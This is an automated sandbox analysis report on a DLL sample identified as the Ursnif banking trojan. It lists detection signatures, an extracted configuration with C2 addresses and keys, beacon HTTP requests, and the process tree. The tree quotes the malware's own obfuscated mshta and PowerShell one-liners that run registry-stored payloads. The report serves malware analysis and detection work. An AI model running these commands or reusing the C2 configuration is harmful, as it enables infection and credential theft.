Windows Analysis Report
pDut.azdgC

Overview

General Information

Sample Name: pDut.azdgC (renamed file extension from azdgC to dll)
Analysis ID: 613867
MD5: b8eea1c2963c2f26ff4ffe8de869c3cc
SHA1: 2a8a13db7afd001f093a2c6f82bc6ed93b1884c5
SHA256: 86ef41e44779b109e70b7d34c011b341c2d90654b149a718a380205287256bef
Tags: dll
Infos:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Windows Shell File Write to Suspicious Folder
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Sigma detected: Suspicious Remote Thread Created
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

barindex
Source: 00000003.00000002.518835628.00000000032D0000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}
Source: pDut.dll ReversingLabs: Detection: 30%
Source: pDut.dll Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05243072 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_05243072
Source: pDut.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.459253096.0000000006640000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.465973430.0000000006640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\in\the\town\where\ahung.pdb source: loaddll32.exe, 00000000.00000000.298329134.0000000000480000.00000002.00000001.01000000.00000003.sdmp, pDut.dll
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.459253096.0000000006640000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.465973430.0000000006640000.00000004.00001000.00020000.00000000.sdmp

Networking

barindex
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49728 -> 13.107.43.16:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49728 -> 13.107.43.16:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49746 -> 146.70.35.138:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49746 -> 146.70.35.138:80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 146.70.35.138 80 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: Joe Sandbox View ASN Name: TENET-1ZA TENET-1ZA
Source: global traffic HTTP traffic detected: GET /phpadmin/5_2Bwaw4P45/G5G_2Bri9js5dP/6i8eec3u2iZZsEg0F_2Bo/d_2BqMRIyr_2BRmo/n2oaEdJDoQ9a_2F/0_2B2EozCoLo00v_2F/xJzX8hfq8/iPqBoTtTmorC_2FgEoT1/Ui5Rir1Tiv3AxHiQWIy/rh6lq3Of5aYhQ8EPvrVJrj/44vLqx1mKcs_2/F_2B09gU/rE50yHayYu_2BOp2Qp10W2E/Rg4hoLXxS1/WyO2tNKQQk0yGQE1R/wvuExnNhCUce/ANjSv_2BDlKR/3.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /phpadmin/o1JPufjt/GxusAKeiWszhS95uJQ6Pkff/K82wV_2FB1/FFi9572w_2BwVlT_2/FFNe3OEDuDjI/JBfn1S9Gj1X/rG8MVUUf7UF9JY/H60Bt_2Bfl23t01NRxG0_/2BxJGTmTJtfTKtyV/qnhybbrG7pKyT5Z/VTdtuctxuutya4BZ4r/9i0FyQBST/lISErNEaGd_2BDuV8mWq/a67VJ79FkTLaxUbSo01/l6OAQv5jgHvtlbXRDaApdW/CfvbZ_2Ba/2A9Ca.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /phpadmin/F4o1AS9iYlusfa6DJZ_2F/8yu55uwFXLXAS5yL/FeETACp_2FdxcoS/uTYQKlQ9V7TRwNvRii/1bQjf7AZx/EBM2_2FDsl9Y09LRn7_2/BmoA45BufAPzAG_2FOv/yJudlrwiWsA49Qqa8cipw1/EvZwB_2FxuuuB/0Ww7eCaZ/fRJIzVq67cgdRbQXLkDAkWb/J56B_2B4ZT/JfDKOmEjDrpAwpeXE/de7MNcXQ_2Fo/Mirbppbye8W/Y86rEsqpSh3YUIS/Zs.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: rundll32.exe, 00000003.00000002.520703269.0000000003478000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://146.70.35.138/&
Source: rundll32.exe, 00000003.00000002.520667993.000000000346C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.520169879.000000000340A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://146.70.35.138/phpadmin/5_2Bwaw4P45/G5G_2Bri9js5dP/6i8eec3u2iZZsEg0F_2Bo/d_2BqMRIyr_2BRmo/n2oa
Source: rundll32.exe, 00000003.00000002.520703269.0000000003478000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://146.70.35.138/phpadmin/F4o1AS9iYlusfa6DJZ_2F/8yu55uwFXLXAS5yL/FeETACp_2FdxcoS/uTYQKlQ9V7TRwNv
Source: rundll32.exe, 00000003.00000002.520703269.0000000003478000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://146.70.35.138/phpadmin/o1JPufjt/GxusAKeiWszhS95uJQ6Pkff/K82wV_2FB1/FFi9572w_2BwVlT_2/FFNe3OED
Source: rundll32.exe, 00000003.00000002.520667993.000000000346C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://config.edge.skype.com/phpadmin/Gz9BfokXvLzEwNYtNO/zJrS7KtlQ/c0o_2F9tPr5OX2xDuTrF/oBhTn_2FXaEa
Source: rundll32.exe, 00000003.00000002.520667993.000000000346C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://config.edge.skype.com/r
Source: rundll32.exe, 00000003.00000003.454702923.0000000006628000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000003.473788937.0000020C7835C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.472223678.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.472064443.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000003.00000003.454702923.0000000006628000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000003.473788937.0000020C7835C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.472223678.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.472064443.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: rundll32.exe, 00000003.00000003.454702923.0000000006628000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000003.473788937.0000020C7835C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.472223678.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.472064443.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05244CC6 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError, 3_2_05244CC6
Source: global traffic HTTP traffic detected: GET /phpadmin/5_2Bwaw4P45/G5G_2Bri9js5dP/6i8eec3u2iZZsEg0F_2Bo/d_2BqMRIyr_2BRmo/n2oaEdJDoQ9a_2F/0_2B2EozCoLo00v_2F/xJzX8hfq8/iPqBoTtTmorC_2FgEoT1/Ui5Rir1Tiv3AxHiQWIy/rh6lq3Of5aYhQ8EPvrVJrj/44vLqx1mKcs_2/F_2B09gU/rE50yHayYu_2BOp2Qp10W2E/Rg4hoLXxS1/WyO2tNKQQk0yGQE1R/wvuExnNhCUce/ANjSv_2BDlKR/3.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /phpadmin/o1JPufjt/GxusAKeiWszhS95uJQ6Pkff/K82wV_2FB1/FFi9572w_2BwVlT_2/FFNe3OEDuDjI/JBfn1S9Gj1X/rG8MVUUf7UF9JY/H60Bt_2Bfl23t01NRxG0_/2BxJGTmTJtfTKtyV/qnhybbrG7pKyT5Z/VTdtuctxuutya4BZ4r/9i0FyQBST/lISErNEaGd_2BDuV8mWq/a67VJ79FkTLaxUbSo01/l6OAQv5jgHvtlbXRDaApdW/CfvbZ_2Ba/2A9Ca.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /phpadmin/F4o1AS9iYlusfa6DJZ_2F/8yu55uwFXLXAS5yL/FeETACp_2FdxcoS/uTYQKlQ9V7TRwNvRii/1bQjf7AZx/EBM2_2FDsl9Y09LRn7_2/BmoA45BufAPzAG_2FOv/yJudlrwiWsA49Qqa8cipw1/EvZwB_2FxuuuB/0Ww7eCaZ/fRJIzVq67cgdRbQXLkDAkWb/J56B_2B4ZT/JfDKOmEjDrpAwpeXE/de7MNcXQ_2Fo/Mirbppbye8W/Y86rEsqpSh3YUIS/Zs.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: Yara match File source: 00000003.00000003.347592975.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347464949.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347651204.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.395328868.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347373616.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347625581.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347667655.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347551672.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.473788937.0000020C7835C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347265097.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.454702923.0000000006628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.472223678.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.394403969.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.392369617.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.472064443.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 344, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6736, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 720, type: MEMORYSTR
Source: Yara match File source: 3.3.rundll32.exe.51194a0.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.51194a0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5796940.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.5240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.57694a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.56ea4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.56ea4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.517576476.0000000005119000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.524999035.000000000546F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.469785731.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.469105501.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.518835628.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.471017124.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.394225143.00000000056EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.394254526.0000000005769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

E-Banking Fraud

barindex
Source: Yara match File source: 00000003.00000003.347592975.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347464949.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347651204.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.395328868.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347373616.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347625581.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347667655.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347551672.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.473788937.0000020C7835C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347265097.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.454702923.0000000006628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.472223678.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.394403969.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.392369617.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.472064443.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 344, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6736, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 720, type: MEMORYSTR
Source: Yara match File source: 3.3.rundll32.exe.51194a0.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.51194a0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5796940.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.5240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.57694a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.56ea4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.56ea4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.517576476.0000000005119000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.524999035.000000000546F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.469785731.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.469105501.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.518835628.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.471017124.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.394225143.00000000056EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.394254526.0000000005769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05243072 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_05243072

System Summary

barindex
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: pDut.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2760 -s 304
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0524475F 3_2_0524475F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0524198A 3_2_0524198A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0524821C 3_2_0524821C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_052425D7 GetProcAddress,NtCreateSection,memset, 3_2_052425D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05244695 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_05244695
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05243A9C NtMapViewOfSection, 3_2_05243A9C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05248441 NtQueryVirtualMemory, 3_2_05248441
Source: pDut.dll Binary or memory string: OriginalFilenamerpcapd.exe0 vs pDut.dll
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: pDut.dll ReversingLabs: Detection: 30%
Source: pDut.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\pDut.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pDut.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pDut.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2760 -s 304
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2760 -s 260
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2760 -s 268
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Wefk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wefk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name iqioaqncxw -value gp; new-alias -name fchfny -value iex; fchfny ([System.Text.Encoding]::ASCII.GetString((iqioaqncxw "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cweuuamv.cmdline
